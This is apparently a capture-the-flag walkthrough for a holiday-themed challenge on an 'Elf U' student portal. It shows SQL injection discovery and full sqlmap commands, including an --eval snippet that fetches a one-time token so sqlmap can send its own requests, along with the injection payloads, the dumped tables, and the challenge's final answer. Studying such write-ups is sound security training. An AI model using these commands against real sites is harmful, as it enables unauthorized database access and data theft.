9. Retrieve Scraps of Paper from ServerΒΆ
Difficulty: ππππ
π Info & HintsΒΆ
Retrieve Scraps of Paper from Server
Gain access to the data on the Student Portal server and retrieve the paper scraps hosted there.
What is the name of Santa's cutting-edge sleigh guidance system?
For hints on achieving this objective, please visit the dorm and talk with Pepper Minstix.
π§π»ββοΈ Pepper Minstix
That's it - hooray!
Have you had any luck retrieving scraps of paper from the Elf U server?
You might want to look into SQL injection techniques.
OWASP is always a good resource for web attacks.
For blind SQLi, I've heard Sqlmap is a great tool.
In certain circumstances though, you need custom tamper scripts to get things going!
SQL Injection
SQLMap Tamper Scripts
What is the name of Santa's cutting-edge sleigh guidance system?
β‘οΈ SolutionΒΆ
Understand the backend:ΒΆ
When you visit the student portal, you will find two forms one for submitting an application and other for query the application status :
Let's go with (Check Application Status](https://studentportal.elfu.org/check.php) page to check the database:
The form send Get request to https://studentportal.elfu.org/application-check.php
with the email and token
:
If we checked the check.php
page source code we can see that the token is hidden value in the form and filled by javascript getting data from validator.php
<input type="hidden" id="token" name="token" value=""/>
function submitApplication() { console.log("Submitting"); elfSign(); document.getElementById("check").submit(); } function elfSign() { var s = document.getElementById("token"); const Http = new XMLHttpRequest(); const url='/validator.php'; Http.open("GET", url, false); Http.send(null); if (Http.status === 200) { console.log(Http.responseText); s.value = Http.responseText; } }
Visit validator.php and try to refesh for 3-4 times. Each visit you will get new token which indicate it's time based token/one time use token.
MTAxMDMyNTA4NTQ0MTU3ODYzMjk0NjEwMTAzMjUwOC41NDQ=_MTI5MzIxNjEwOTM2MzIzMjMzMDQwMjczLjQwOA== MTAxMDMyNTA3NjQ4MTU3ODYzMjkzMjEwMTAzMjUwNy42NDg=_MTI5MzIxNjA5Nzg5NDQzMjMzMDQwMjQ0LjczNg== MTAxMDMyNTA3OTY4MTU3ODYzMjkzNzEwMTAzMjUwNy45Njg=_MTI5MzIxNjEwMTk5MDQzMjMzMDQwMjU0Ljk3Ng==
SQL InjectionΒΆ
Let's try to inject the query to compromise the database:
send '
as an email input to check the error we are getting from the database.
ERROR
Error: SELECT status FROM applications WHERE elfmail = ''';
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''''' at line 1
We get valuable information: application
table , MariaDB
database dbms.
Let's use Sqlmap tool to automate the injection and retrive the data.
-
Download the tool link or using
git
command.git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
-
We need to get the token, so we will use small python code with
--eval
option in sqlmapthe script will make a GET request to
validator.php
retrieve the token and store it in a variable token to be used by sqlmapimport requests r = requests.get('https://studentportal.elfu.org/validator.php') token = r.text;
You will need to insall
requests
package:pip3 install requests
-
sqlmap commands :
-
Let's start by testing the databases for injection:
python3 sqlmap.py -u "https://studentportal.elfu.org/application-check.php?elfmail=1&token=1" -p elfmail --dbms=MariaDB --eval="import requests; r = requests.get('https://studentportal.elfu.org/validator.php');token = r.text;" -v 4
-u
the page communicating with targeted database.
-p
Testable parameter .
--dbms=MariaDB
set dbms type.
--eval=EVALCODE
Evaluate provided Python code before the request.
-v
set the verbosity level of output messages.sqlmap identified the following injection point(s) with a total of 67 HTTP(s) requests: --- Parameter: elfmail (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: elfmail=1' AND 1817=1817 AND 'VsQU'='VsQU&token=1 Vector: AND [INFERENCE] Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: elfmail=1' AND (SELECT 6257 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT (ELT(6257=6257,1))),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'kcsP'='kcsP&token=1 Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: elfmail=1' AND (SELECT 2136 FROM (SELECT(SLEEP(5)))DMUR) AND 'eZch'='eZch&token=1 Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) ---
-
Now let's try to get the databases:
python3 sqlmap.py -u "https://studentportal.elfu.org/application-check.php?elfmail=1&token=1" -p elfmail --dbms=MariaDB --eval="import requests; r = requests.get('https://studentportal.elfu.org/validator.php');token = r.text;" --dbs -v 4
--dbs
Enumerate DBMS databasesavailable databases [2]: [*] elfu [*] information_schema
-
Get
elfu
database tables:python3 sqlmap.py -u "https://studentportal.elfu.org/application-check.php?elfmail=1&token=1" -p elfmail --dbms=MariaDB --eval="import requests; r = requests.get('https://studentportal.elfu.org/validator.php');token = r.text;" --tables -v 4 -D elfu
--tables
Enumerate DBMS database tables
-D DB
DBMS database to enumerateDatabase: elfu [3 tables] +--------------+ | applications | | krampus | | students | +--------------+
The tables looks interesting. let's focus on
students
,krampus
becauseapplications
table will be filled with all testing queries everyone did! -
Dumping
students
&krampus
tables:python3 sqlmap.py -u "https://studentportal.elfu.org/application-check.php?elfmail=1&token=1" -p elfmail --dbms=MariaDB --eval="import requests; r = requests.get('https://studentportal.elfu.org/validator.php');token = r.text;" -v 4 -D elfu -T "krampus,students" --dump
-T
DBMS database table(s) to enumerate
--dump
Dump DBMS database table entriesDatabase: elfu Table: krampus [6 entries] +----+-----------------------+ | id | path | +----+-----------------------+ | 1 | /krampus/0f5f510e.png | | 2 | /krampus/1cc7e121.png | | 3 | /krampus/439f15e6.png | | 4 | /krampus/667d6896.png | | 5 | /krampus/adb798ca.png | | 6 | /krampus/ba417715.png | +----+-----------------------+
Also the result saved in csv files in folder at home directory
.sqlmap/output/studentportal.elfu.org
-
Alternative method
We can test injection and dump the all tables with one command but it will take longer time:
python3 sqlmap.py -u "https://studentportal.elfu.org/application-check.php?elfmail=1&token=1" -p elfmail --dbms=MariaDB --eval="import requests; r = requests.get('https://studentportal.elfu.org/validator.php');token = r.text;" --dump
Retrieve the paper scraps :ΒΆ
Using the data we retrieved from krampus table we now can get all scraps which we know from the objective it's hosted at the student portal
https://studentportal.elfu.org/krampus/0f5f510e.png https://studentportal.elfu.org/krampus/1cc7e121.png https://studentportal.elfu.org/krampus/439f15e6.png https://studentportal.elfu.org/krampus/667d6896.png https://studentportal.elfu.org/krampus/adb798ca.png https://studentportal.elfu.org/krampus/ba417715.png
The name of Santa's cutting-edge sleigh guidance system
super sled-o-matic
Congratulations! You have completed the Retrieve Scraps of Paper from Server challenge! π
π What you've learnedΒΆ
- Using sql injection to get errors that expose information about the database.
- Automating Sql injection using sqlmap.
- Evaluate python code in sqlmap command.